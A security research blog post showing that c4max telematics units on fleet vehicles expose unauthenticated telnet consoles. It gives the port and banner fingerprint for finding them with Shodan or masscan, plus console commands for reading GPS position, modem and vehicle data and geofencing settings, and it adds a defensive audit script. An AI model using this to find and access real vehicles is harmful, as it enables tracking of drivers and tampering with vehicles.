Hacking industrial vehicles from the internet
It is possible to monitor and control fleet trucks, public buses or delivery vans from the internet, obtaining their speed, position, and a lot of other parameters. You can even control some parameters of the vehicle or hack into the CAN bus of the vehicle remotely.
Those vehicles have a Telematics Gateway Unit (TGU) device and a 3G/4G/GPRS/LTE/EDGE/HSDPA modem to connect to the internet, with a public IP address.
There are thousands of TGUs connected to the internet, with no authentication at all and with administrative interfaces through a web panel or a telnet session.
Finding publicly exposed TGUs in the internets
There are tons of open TGU and similar vehicle appliances on the internet. One very interesting and easy to find is the c4max.
The c4max smartbox is a TGU with powerful capabilities, a simple console on port 23, and is easy to identify while scanning the internet.
A quick search with shodan reveals 733 open c4max devices on the internet, at the time of scanning. Because of the nature of these devices, connected to the internet using mobile data plans and in industrial vehicles, the devices you can find vary a lot from time to time.
Scanning the internet yourself with masscan finds different industrial vehicles working at different hours.
The c4max can be found looking for port 23, and the banner ‘gps’ or ‘welcome on console’ or similar strings from the telnet console they provide.
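From the operator's side, the same fingerprint (port 23 plus those banner strings) can be used to audit a fleet's own address ranges. The following is an added example, not code from the original post: it classifies records from an inventory scan export offline. The record format, the owned ranges and the sample data are constructed assumptions.

```python
import ipaddress

# Banner substrings the post gives for the c4max telnet console (matched case-insensitively).
BANNER_HINTS = ("gps", "welcome on console")

# Assumption: ranges the mobile provider assigned to the fleet (documentation ranges used here).
OWNED_RANGES = [ipaddress.ip_network("203.0.113.0/24"),
                ipaddress.ip_network("198.51.100.0/25")]

# Constructed sample export: one record per open port seen by the operator's own scan.
SAMPLE_RECORDS = [
    {"ip": "203.0.113.10", "port": 23, "banner": "Welcome on console\r\nBasics[C4E]> "},
    {"ip": "203.0.113.11", "port": 22, "banner": "SSH-2.0-OpenSSH_8.4"},
    {"ip": "203.0.113.12", "port": 23, "banner": "login: "},
    {"ip": "198.51.100.200", "port": 23, "banner": "GPS console"},  # outside the owned /25
    {"ip": "not-an-ip", "port": 23, "banner": "gps"},               # malformed record
    {"ip": "198.51.100.7", "port": 23, "banner": None},             # port open, no banner captured
]

def is_owned(ip_text):
    """True only for a well-formed address inside one of the operator's ranges."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(addr in net for net in OWNED_RANGES)

def classify(record):
    """Return 'out_of_scope', 'no_telnet', 'telnet_open' or 'tgu_console_exposed'."""
    if not is_owned(record.get("ip", "")):
        return "out_of_scope"
    if record.get("port") != 23:
        return "no_telnet"
    banner = (record.get("banner") or "").lower()
    if any(hint in banner for hint in BANNER_HINTS):
        return "tgu_console_exposed"
    return "telnet_open"  # telnet reachable from outside is a finding even without the banner

def audit(records):
    """Map each in-scope IP with a telnet finding to its verdict."""
    findings = {}
    for rec in records:
        verdict = classify(rec)
        if verdict in ("telnet_open", "tgu_console_exposed"):
            findings[rec["ip"]] = verdict
    return findings

if __name__ == "__main__":
    for ip, verdict in sorted(audit(SAMPLE_RECORDS).items()):
        print(f"{ip}\t{verdict}")
```

Any device reported here should be moved behind a private APN or VPN, or have its console disabled or password protected.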
An example with shodan:
What can be done inside a c4max TGU
The c4max devices that I found on the internet are not password protected, and there is no security that prevents anyone from connecting to them.
The telnet interface has 3 screens: basic, advanced, and commands.
The basic interface:
The advanced interface:
Some interesting commands:
Basics[C4E]> iostate
Input 1 : Disconnected
Output 1 : Disconnected
Output 2 : Disconnected
Alarm : Disconnected
Ignition : Connected
Basics[C4E]>
Retrieving GPS coordinates of the vehicle (removed some info from the output, replaced by XXX…):
Basics[C4E]> gpspos
Internal antenna
GPRMC Frame value is $GPRMC XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
GPGGA Frame value is $GPGGA,XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Basics[C4E]>
And with the gps coordinates, we can locate the vehicle in google maps, for example:
List available modules:
Basics[C4E]> list
dbg pdm sql wdg boot dhcpServer sshTunnel serialPPP cpnManager netMonitoring boardsInfo messageBrokerProxy versionManager messageBroker config dnsProxy fileManager dictionary can gps ios usb bootReason batt leds onewire wifi smartCardManager j1587 j1708 j1850 j1939 kline modem nvram usbHfk chronoTachyGraph sensors dtc jvm obd ibutton dataEmitter jbinaryGate ledManager network adminProtocol crashSensor timeZoneManager instantFixII modemOperatorDriver gpsOdometer smartSensors relayControl driverBehavior obdStacks locales fileSync pwrManager gpsMvtDetector geoFencing sensorsCalibration updateManager companionSoftwareClient urlServer gpsEcho binaryGateMonitor sensorsRecorder messageGate binaryGate deadReckoning speedDropControl criticalCommandManager cacheManager update acceleroMvtDetector history commandManager dataRecorder eeprom
Basics[C4E]>
The can bus module:
Basics[C4E]> list can
com::mdi::drivers::can.activateDebug=0
com::mdi::drivers::can.active_protocols=255
Basics[C4E]>
And with listdb, we can get a lot of information about the vehicle, the company that operates it, the driver, etc., which I will not post here for obvious reasons. Some of the information from listdb:
...
MDI_EXT_BATT_VOLTAGE='12687'
MDI_GPS_SPEED='0000090'
...
Basics[C4E]> modem
ppp0 XXXXXXXXXXX
APN: XXXXXXXXXXX
autoAPN: XXXXXXXXXXX
Your IMEI is : XXXXXXXXXXX
Your IMSI is : XXXXXXXXXXX
DNS servers are
nameserver XXXXXXXXXXX
nameserver XXXXXXXXXXX
In case of problem, check your configuration (with "list all" command)
Basics[C4E]>
We can even geofence the vehicle (I don’t know what it would cause):
com::mdi::services::geoFencing.periodInMs=5000
com::mdi::services::geoFencing.directory=/mnt/user/writeDir/geofencing
com::mdi::services::geoFencing.directory=/mnt/user/data/geofencing
com::mdi::services::geoFencing.directory=/mnt/user/mmc/geofencing
com::mdi::services::geoFencing.areaModeSearch=0
Telematics Gateway Units exposed to the internet with public addresses and no authentication can be used to remotely track industrial vehicles, geofence them, or change the mission route. If you read the schematics of these units:
You can see this device is connected to the bus of the vehicle, to the ignition, to the battery… and the things this could theoretically cause are very scary. Of course, since I do not have one of these available, just testing in the wild would not be responsible and of course I will not do it, so I still don’t know how far one can go with access to one of these devices. Caution is advised.
IMPORTANT NOTE: ALL THE INFORMATION CONTAINED IN THIS POST IS INTENDED FOR EDUCATIONAL AND RESEARCH PURPOSES ONLY. MANIPULATING REAL AUTOMOTIVE DEVICES FROM THE INTERNET IS NOT ETHICAL AND COULD BE ILLEGAL UNDER YOUR JURISDICTION. ANY VIEWS OR OPINIONS EXPRESSED IN THIS ARTICLE ARE ONLY MY OPINIONS AND NOT RELATED TO MY EMPLOYER OR ANY ORGANIZATION I BELONG TO. ALL THE INFORMATION PROVIDED IN THIS POST HAS BEEN COLLECTED USING PUBLICLY AVAILABLE RESOURCES, LIKE MANUFACTURER MANUALS AND SPECIALIZED SEARCH ENGINES. IN THE COURSE OF THESE FINDINGS, THE DEVICES DESCRIBED HERE NEVER HAD ANY KIND OF SECURITY IMPLEMENTED TO PREVENT CONNECTIONS TO THE DISCOVERED INTERFACES AND THEIR SECURITY WAS NEVER CIRCUMVENTED OR BYPASSED.